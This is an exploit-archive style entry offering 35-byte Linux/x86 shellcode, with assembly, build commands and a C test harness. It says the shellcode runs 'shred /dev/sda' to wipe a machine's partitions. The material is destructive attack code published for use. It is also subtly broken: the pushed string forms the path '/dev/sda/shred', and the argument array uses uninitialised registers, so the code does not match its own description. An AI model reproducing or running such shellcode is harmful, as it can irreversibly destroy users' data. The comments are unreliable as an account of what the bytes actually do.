35 bytes small Linux/x86 /dev/sda wiping shellcode.
19e25cdfd1453bac178a73395ba04bfa
# Exploit Title: Linux/x86 - Shred /dev/sda wipe partition Shellcode (35 bytes)
# Google Dork: None
# Date: 13-08-2020
# Exploit Author: cybersaki
# Vendor Homepage: None
# Software Link: None
# Version: None
# Tested on: Kali linux 2020.2a i386 x86
# CVE : none
# Shellcode-length : 35
# SLAE-id : Purchased | [email protected]
; Description :
; The following shellcode will execute shred /dev/sda to wipe the partitions.
; Shellcode :
section .text
global _start
_start:
xor eax, eax
push eax
push word 0x6465
push 0x7268732f
push 0x6164732f
push 0x7665642f
mov ebx, esp
_exec:
push eax
push ebp
push edi
push esi
push ebx
mov ecx, esp
mov al, 0xb
int 0x80
; Compilation :
; nasm -f elf32 -o filename.o filename.nasm
; ld -z execstack -o filename filename.o
; gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
; Shellcode :
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x31\xc0\x50\x66\x68\x65\x64\x68\x2f\x73\x68\x72\x68\x2f\x73\x64\x61\x68\x2f\x64\x65\x76\x89\xe3\x50\x55\x57\x56\x53\x89\xe1\xb0\x0b\xcd\x80";
int main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}